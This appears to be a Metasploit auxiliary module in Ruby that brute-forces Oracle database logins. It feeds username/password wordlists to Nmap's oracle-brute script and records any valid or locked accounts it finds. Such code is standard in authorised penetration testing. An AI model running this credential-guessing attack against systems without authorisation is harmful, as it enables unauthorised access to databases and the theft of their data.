Path: blob/master/modules/auxiliary/scanner/oracle/oracle_login.rb
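##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Drives Nmap's oracle-brute NSE script from the framework: the credential
# pairs gathered by AuthBrute are written to a temporary credfile, Nmap is
# run against the scan targets with that file, and the script output is
# parsed back into service, note and login records.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Nmap
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  # Matches the "user:pass =>" prefix of an oracle-brute result line.
  CRED_LINE = /\s+([^\s]+):([^\s]+) =>/.freeze

  # Creates an instance of this module.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Oracle RDBMS Login Utility',
      'Description' => %q{
        This module attempts to authenticate against an Oracle RDBMS
        instance using username and password combinations indicated
        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

        Due to a bug in nmap versions 6.50-7.80 may not work.
      },
      'Author' => [
        'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse
        'todb' # this Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'URL', 'https://www.oracle.com/database/' ],
        [ 'CVE', '1999-0502'], # Weak password CVE
        [ 'URL', 'https://nmap.org/nsedoc/scripts/oracle-brute.html']
      ]
    ))

    register_options(
      [
        OptPath.new('USERPASS_FILE', [ false, "File containing (space-separated) users and passwords, one pair per line",
          File.join(Msf::Config.data_directory, "wordlists", "oracle_default_userpass.txt") ]),
        OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])
      ])
  end

  # Oldest Nmap release this module will run with (checked in #run).
  def minimum_nmap_version
    "5.50"
  end

  # Scanner entry point.
  #
  # Refuses to run on an Nmap older than #minimum_nmap_version, writes one
  # "user/pass" line per AuthBrute pair into a temporary credfile, runs Nmap
  # with the arguments from #nmap_build_args and dispatches the XML result to
  # the Nokogiri or plain-hash parser. The credfile is removed even if the
  # Nmap run raises.
  #
  # @return [false, nil] false when the Nmap version check fails
  def run
    unless nmap_version_at_least? minimum_nmap_version
      print_error "Installed Nmap version is not at least #{minimum_nmap_version}. Exiting..."
      return false
    end
    print_status "Nmap: Setting up credential file..."
    credfile = create_credfile
    cred_count = 0
    each_user_pass(true) do |user, pass|
      credfile[0].puts format("%s/%s", user, pass)
      cred_count += 1
    end
    credfile[0].flush
    nmap_build_args(credfile[1])
    print_status "Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'..."
    begin
      nmap_run
    ensure
      # The credfile holds plaintext pairs; make sure it never outlives the run.
      credfile[0].close
      credfile[0].unlink
    end
    if Rex::Parser.nokogiri_loaded
      nmap_hosts { |type, data| process_nokogiri_callback(type, data) }
    else
      nmap_hosts { |host| process_host(host) }
    end
  end

  # @return [String] the SID option as a string
  def sid
    datastore['SID'].to_s
  end

  # Resets the Nmap argument list and adds the oracle-brute script with its
  # script-args (SID, credfile mode and path, a single brute thread and the
  # delay from #set_brute_delay), plus -P0 and -n; -v follows VERBOSE.
  #
  # @param credpath [String] path to the credfile as Nmap should see it
  def nmap_build_args(credpath)
    nmap_reset_args
    nmap_append_arg "-P0"
    nmap_append_arg "--script oracle-brute"
    script_args = [
      "tns.sid=#{sid}",
      "brute.mode=creds",
      "brute.credfile=#{credpath}",
      "brute.threads=1",
      "brute.delay=#{set_brute_delay}"
    ]
    nmap_append_arg "--script-args \"#{script_args.join(",")}\""
    nmap_append_arg "-n"
    nmap_append_arg "-v" if datastore['VERBOSE']
  end

  # Sometimes with weak little 10g XE databases, you will exhaust
  # available processes from the pool with lots and lots of
  # auth attempts, so use bruteforce_speed to slow things down
  #
  # @return [Numeric] the brute.delay value for the current BRUTEFORCE_SPEED
  #   (0 for any value outside 0..4)
  def set_brute_delay
    case datastore["BRUTEFORCE_SPEED"]
    when 4 then 0.25
    when 3 then 0.5
    when 2 then 1
    when 1 then 15
    when 0 then 60 * 5
    else 0
    end
  end

  # Creates the temporary credfile and stores it in @credfile.
  #
  # @return [Array(Rex::Quickfile, String)] the file object and the path to
  #   hand to Nmap; under Cygwin with a cygdrive-based nmap_bin the path is
  #   converted to its Win32 form
  def create_credfile
    outfile = Rex::Quickfile.new("msf3-ora-creds-")
    outfile_path =
      if Rex::Compat.is_cygwin && self.nmap_bin =~ /cygdrive/i
        Rex::Compat.cygwin_to_win32(outfile.path)
      else
        outfile.path
      end
    @credfile = [outfile, outfile_path]
  end

  # Nokogiri parser callback. Only :port_script events for oracle-brute on an
  # open port with an IPv4 address are passed to #parse_script_output.
  #
  # @param type [Symbol] event type from the parser
  # @param data [Hash] event payload
  def process_nokogiri_callback(type, data)
    return unless type == :port_script
    return unless data["id"] == "oracle-brute"
    return unless data[:addresses].key? "ipv4"
    return unless data[:port]["state"] == ::Msf::ServiceState::Open
    addr = data[:addresses]["ipv4"].to_s
    port = data[:port]["portid"].to_i
    parse_script_output(addr, port, data["output"])
  end

  # Non-Nokogiri parser path. The host's oracle-brute script output is parsed
  # once per port listed for the host; hosts without script output are skipped.
  #
  # @param h [Hash] host record with "addr", "ports" and "scripts" keys
  def process_host(h)
    scripts = h["scripts"]
    return if scripts.nil? || scripts.empty?
    h["ports"].each do |p|
      scripts.each do |id, output|
        next unless id == "oracle-brute"
        # to_i keeps the port type in step with process_nokogiri_callback
        parse_script_output(h["addr"], p["portid"].to_i, output)
      end
    end
  end

  # Extracts the credential pair from a result line.
  #
  # @param str [String] one line of oracle-brute output
  # @return [Array(String, String), nil] [user, pass], or nil when the line
  #   does not match CRED_LINE
  def extract_creds(str)
    m = str.match(CRED_LINE)
    m && m[1, 2]
  end

  # Reports the Oracle service and its SID note once per #parse_script_output
  # call, using @oracle_reported as the guard.
  def report_oracle_instance(addr, port)
    return if @oracle_reported
    report_service(:host => addr, :port => port, :proto => "tcp", :name => "oracle")
    report_note(:host => addr, :port => port, :proto => "tcp", :type => "oracle.sid", :data => sid, :update => :unique_data)
    @oracle_reported = true
  end

  # Stores a credential core and the login that proved it.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password (absent for
  #   locked accounts, so private_data is nil), :status and :proof (not set by
  #   the callers in this module)
  # @return the result of create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: opts[:status],
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Turns one host's oracle-brute output into console output and records.
  #
  # An unresolvable-SID banner or a "No valid accounts found" summary ends
  # processing with a message. Otherwise each "Login correct" line is stored
  # as a SUCCESSFUL login (an "<empty>" password token becomes ""), each
  # "Account locked" line as DENIED_ACCESS with no password, and "ERROR:"
  # lines are echoed. Result lines without a recognisable user:pass prefix are
  # skipped rather than raising.
  #
  # @param addr [String] host address
  # @param port [Integer] listener port
  # @param output [String, nil] raw script output
  def parse_script_output(addr, port, output)
    msg = "#{addr}:#{port} - Oracle -"
    @oracle_reported = false
    # NOTE(review): treat a missing script output like an empty one — confirm nil can reach here
    output = output.to_s
    if output =~ /TNS: The listener could not resolve \x22/n
      print_error "#{msg} Invalid SID: #{sid}"
    elsif output =~ /Accounts[\s]+No valid accounts found/nm
      print_status "#{msg} No valid accounts found"
    else
      output.each_line do |oline|
        if oline =~ /Login correct/
          report_oracle_instance(addr, port)
          creds = extract_creds(oline)
          next unless creds
          user, pass = creds
          pass = "" if pass == "<empty>"
          print_good "#{msg} Success: #{user}:#{pass} (SID: #{sid})"
          report_cred(
            ip: addr,
            port: port,
            user: "#{sid}/#{user}",
            password: pass,
            service_name: 'tcp',
            status: Metasploit::Model::Login::Status::SUCCESSFUL
          )
        elsif oline =~ /Account locked/
          report_oracle_instance(addr, port)
          creds = extract_creds(oline)
          next unless creds
          user = creds[0]
          print_good "#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked"
          report_cred(
            ip: addr,
            port: port,
            user: "#{sid}/#{user}",
            service_name: 'tcp',
            status: Metasploit::Model::Login::Status::DENIED_ACCESS
          )
        elsif oline =~ /^\s+ERROR: (.*)/
          print_error "#{msg} NSE script error: #{Regexp.last_match(1)}"
        end
      end
    end
  end
end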